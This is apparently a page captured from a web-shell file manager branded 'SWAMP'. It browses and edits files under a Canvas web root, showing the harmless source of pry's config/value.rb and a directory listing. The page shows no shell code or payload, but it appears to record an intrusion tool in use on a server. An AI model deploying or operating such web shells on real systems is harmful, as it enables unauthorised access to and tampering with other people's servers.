░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/vendor/bundle/ruby/3.1.0/gems/pry-0.14.2/lib/pry/config
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: value.rb
# frozen_string_literal: true class Pry class Config # Value holds a value for the given attribute and decides how it should # be read. Procs get called, other values are returned as is. # # @since v0.13.0 # @api private class Value def initialize(value) @value = value end def call unless [Config::MemoizedValue, Config::LazyValue].include?(@value.class) return @value end @value.call end end end end
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 attributable.rb
RB
565 B
2023-09-24 03:48
EDIT
📄 lazy_value.rb
RB
620 B
2023-09-24 03:48
EDIT
📄 memoized_value.rb
RB
739 B
2023-09-24 03:48
EDIT
📄 value.rb
RB
503 B
2023-09-24 03:48
EDIT